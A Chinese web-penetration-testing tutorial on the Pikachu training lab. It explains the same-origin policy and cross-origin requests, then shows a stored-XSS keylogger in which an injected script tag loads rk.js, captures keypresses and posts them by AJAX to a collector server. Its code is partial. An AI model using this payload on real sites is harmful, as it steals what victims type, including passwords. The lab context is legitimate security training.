web渗透测试-从入门到放弃-04XSS-键盘记录
案例-xss键盘记录
1.在实验前,先了解一下什么是跨域
http:// www . xyz.com : 8080 / script/test.js
协议 子域名 主域名 端口 资源地址
当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。
下面的地址同源吗?
http:// www . xyz.com : 8080 / script/test.js
http:// www . xyz.com : 8081 / script/test.js
不同源,端口不一样
http:// www . xyz.com : 8080 / script/test.js
http:// client . xyz.com : 8080 / script/test.js
不同源,子域名不一样
https:// www . xyz.com : 8080 / script/test.js
http:// www. xyz.com : 8080 / script/test.js
不同源,协议不一样
2.跨域-同源策略
而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的javascrip并不能操作y.com域下的对象。
如果想要跨域操作,则需要管理员进行特殊的配置。比如通过:header(“Access-Control-Allow-Origin:x.com”)指定。
Tips: 下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的。
<script src=“...”> //js,加载到本地执行
<img src=“…”> //图片
<link href=“…”> //css
<iframe src=“…”> //任意资源
3.为什么要有同源策略:
A登陆了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com
如果没有同源策略,即:urlb上的js可以操作A的内容(如:获取cookie等)有了同源策略,就限制了这种情况。
再比如:
一个恶意站点A上使用了,发送该恶意url到攻击对象,攻击对象登 陆后如果没有同源策略,则A上的JS即可获取B站点的登陆信息。
开始实验:
回到存储型xss:
这里构造了一个可以嵌入调用pkxss下rkeypress中的rk.js文件,这个js文件可以通过里面的onkeypress的方法获取输入的值,然后通过show方法中调用一个阿贾克斯的异步请求发送到后台系统中。
<script src="http://192.168.10.130/pikachu/pkxss/rkeypress/rk.js"></script>
function onkeypress() {var realkey = String.fromCharCode(event.keyCode);xl+=realkey;show();
}document.onkeypress = onkeypress;function show() {ajax = createAjax();ajax.onreadystatechange = function () {if (ajax.readyState == 4) {if (ajax.status == 200) {var data = ajax.responseText;} else {alert("页面请求失败");}}}
然后我们进入我们pkxss站点下rkeypress中,确认rkserver.php文件中
//设置允许被跨域访问
header(“Access-Control-Allow-Origin:*”);
在打开rk.js,对最下面的
ajax.open(“POST”, “http://127.0.0.1/pikachu/pkxss/rkeypress/rkserver.php”,true);
进行修改,地址改为搭建pkxss的站点,后面的目录结构不变。
回到存储型xss下,我们点击提交后可以通过F12查看是否成功嵌入了js文件,成功后,我们在框框中随意输入一些东西。
然后到后台管理系统中,键盘记录,发现刚刚输入的已经被记录了。
web渗透测试-从入门到放弃-04XSS-键盘记录相关推荐
- 软件测试:web渗透测试怎样入门!讲透了...
一.简介 1.web渗透测试概述 渗透测试:模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法. web渗透测试:只针对web应用的渗透测试 2.常见web安全漏洞 1.输入输出验证不充分 ...
- 学完可入狱:《Web渗透测试-基于Kali Linux》经典黑客入门教程
特别说明 此教程为纯技术分享!严禁利用本书所提到的漏洞和技术进行非法攻击,本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任! 前言 网络江湖,风起云涌,攻防 ...
- Web渗透测试常规套路
注:文章首发自合天智汇微信公众平台 0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路.工具可能在如今XX狗.XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中 ...
- 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...
- Kali Linux Web 渗透测试— 第十二课-websploit
Kali Linux Web 渗透测试- 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试- 第十二课-websploit..................... ...
- 轻量级Web渗透测试工具jSQL
轻量级Web渗透测试工具jSQL jSQL是Kali集成的一款轻量级的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加更多的功能,扩展形成一个综合性的Web渗透测试工具.Kali提供的版本较 ...
- kali linux 2.0 web 渗透测试 电子书
原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
Kali Linux Web 渗透测试视频教程-第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...
- 什么是Web渗透测试
什么是Web渗透测试 渗透测试( Penetration Test)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节.渗透测试能够直观的让管理人员知道 ...
最新文章
- html5 游戏制作软件,制作h5小游戏的免费软件有哪些?
- iar代码优化影响运行速度吗_IAR中优化等级对Kinetis FGPIO执行速度的影响
- HDU 3001 Travelling
- 怎么在linux操作python_pythonlinux怎么操作
- Python判断变量类型
- 更新SQL Server实例所有数据库表统计信息
- android 多点
- Python随机梯度下降法(二)
- 海量数据 网站中用户积分排名问题
- edge chrome Android,微软Edge浏览器正式登陆Android平台
- QML 获取当前时间戳 yyyy-MM-dd hh:mm:ss.zzz
- HTML网页设计制作大作业(div+css)~ 环境保护(5个页面)
- Linux 二进制分析
- 360测绘云Quake网络空间测绘系统双领域上榜“安全牛”
- Discarding previously cached master state
- HDU3446 daizhenyang‘s chess【带花树】
- bootstrap轮播速度_BootStrap:轮播插件
- 第五届 蓝桥杯 海盗分金币 C语言
- 2020危险化学品经营单位安全管理人员考试题及危险化学品经营单位安全管理人员模拟考试
- 一加7t人脸识别_一加7T深度测评:它体现了最佳的技术价值吗?